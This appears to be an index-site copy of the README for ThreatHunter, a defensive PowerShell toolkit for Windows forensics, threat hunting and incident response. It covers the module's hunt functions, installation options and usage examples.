Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/blwhit/threathunter

Advanced PowerShell DFIR module for forensic analysis, threat hunting, and cmdline investigation in Windows.
https://github.com/blwhit/threathunter

cybersecurity dfir digital-forensics evtx-analysis forensic-analysis forensics incident-response malware-detection powershell security threat-hunting virustotal windows

Last synced: 2 days ago
JSON representation

Advanced PowerShell DFIR module for forensic analysis, threat hunting, and cmdline investigation in Windows.

Awesome Lists containing this project

README 

          
threathunter



## Overview



ThreatHunter is a comprehensive PowerShell toolkit designed for threat hunting, digital forensics, and incident response (DFIR). 



It provides a suite of hunt functions to detect persistence mechanisms, analyze system artifacts, search event logs, and generate detailed forensic reports - all through PowerShell on the command line.



**[Read the Wiki](../../wiki)**



---



## 🎯 Core Capabilities



| Function | Purpose |

|----------|---------|

| **Hunt-ForensicDump** | Forensic collection with interactive HTML reporting |

| **Hunt-Persistence** | Detect 60+ persistence techniques (registry, services, WMI, tasks) |

| **Hunt-Logs** | Event log analysis with caching and IOC detection |

| **Hunt-Browser** | Browser history/extension analysis with tool integration |

| **Hunt-Files** | File hunting by time, content, hashes, and ADS |

| **Hunt-Registry** | Registry search, autoruns, and Run MRU (ClickFix detection) |

| **Hunt-Services** | Service enumeration with svchost DLL resolution |

| **Hunt-Tasks** | Scheduled task analysis with privilege detection |

| **Hunt-VirusTotal** | VirusTotal API integration with auto-upload |



---



## 🔧 Installation



### Option 1: Install the Module from PS Gallery

```powershell

Install-Module ThreatHunter -Force -AllowClobber



Import-Module ThreatHunter

```



#### Install Module for Temporary Usage

```powershell

Install-Module ThreatHunter -Scope CurrentUser



Import-Module ThreatHunter



# When Done

Uninstall-Module ThreatHunter

```



### Option 2: Install from Git

```powershell

git clone https://github.com/blwhit/ThreatHunter.git



cd .\ThreatHunter\



Import-Module .\ThreatHunter.psd1

```



### Option 3: Install from Web Request

```powershell

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/blwhit/ThreatHunter/refs/heads/main/ThreatHunter.psm1" -OutFile "ThreatHunter.psm1"



Import-Module ".\ThreatHunter.psm1"

```



### Troubleshooting Errors:



#### [Problem] Execution Policy is Blocking Module

```

Import-Module : File 'ThreatHunter.psm1' cannot be loaded because running scripts is disabled on this system.

```



#### [Fix] Temporarily set execution policy for the current PowerShell session.

```powershell

Set-ExecutionPolicy Unrestricted -Scope Process

```



---



## 🚀 Quick Examples

```powershell



# Quick forensic dump and Export EVTZ to ZIP

Hunt-ForensicDump -StartDate "3D" -LoadBrowserTool -SkipConfirmation -ExportLogs



# Hunt for persistence

Hunt-Persistence -Aggressive



# Search all event logs for IOCs

Hunt-Logs -StartDate "7D" -Search "mimikatz"



# Pull all browser history

Hunt-Browser -LoadTool -SkipConfirmation

```



---



## 📋 Requirements



- PowerShell 5.0+

- Windows 7/Server 2008 R2 or later

- Administrator privileges (recommended)



---



## ⚡ Key Features



- **Pure PowerShell** - No compiled binaries or external dependencies

- **Interactive HTML Reports** - Single-file forensic reports with dark/light themes

- **Smart Caching** - Browser and log caching for fast repeated searches

- **Multiple Outputs** - Console, CSV, PowerShell objects

- **Date Filtering** - Flexible relative and absolute date formats

- **MITRE ATT&CK** - Persistence techniques mapped to framework

- **ClickFix Detection** - Analyze Win+R commands for social engineering attacks

- **Offline Analysis** - Process exported EVTX logs and CSV files



---



## 📚 Documentation



- **[Home](../../wiki/Home)** - Module overview and quick start

- **[Hunt-ForensicDump](../../wiki/Hunt-ForensicDump)** - Master forensic collection

- **[Hunt-Persistence](../../wiki/Hunt-Persistence)** - 60+ persistence techniques

- **[Hunt-Logs](../../wiki/Hunt-Logs)** - Event log hunting

- **[Hunt-Browser](../../wiki/Hunt-Browser)** - Browser analysis

- **[Hunt-Files](../../wiki/Hunt-Files)** - File system hunting

- **[Hunt-Registry](../../wiki/Hunt-Registry)** - Registry analysis

- **[Hunt-Services](../../wiki/Hunt-Services)** - Service enumeration

- **[Hunt-Tasks](../../wiki/Hunt-Tasks)** - Scheduled task analysis

- **[Hunt-VirusTotal](../../wiki/Hunt-VirusTotal)** - VirusTotal integration



---



## 🛡️ Use Cases



- **Incident Response** - Quick triage and comprehensive data collection

- **Threat Hunting** - Proactive search for persistence and IOCs

- **Forensic Analysis** - Detailed system artifact examination



---



## 🔗 Resources



- **PowerShell Gallery**: https://www.powershellgallery.com/packages/ThreatHunter/1.0

- **Wiki Documentation**: [View the Wiki](../../wiki)

- **MITRE ATT&CK**: https://attack.mitre.org

- **Issue Tracker**: [Submit an Issue](../../issues)



---



**Author**: [Blake White]  

**Version**: 1.0  

**Last Updated**: Jan 2026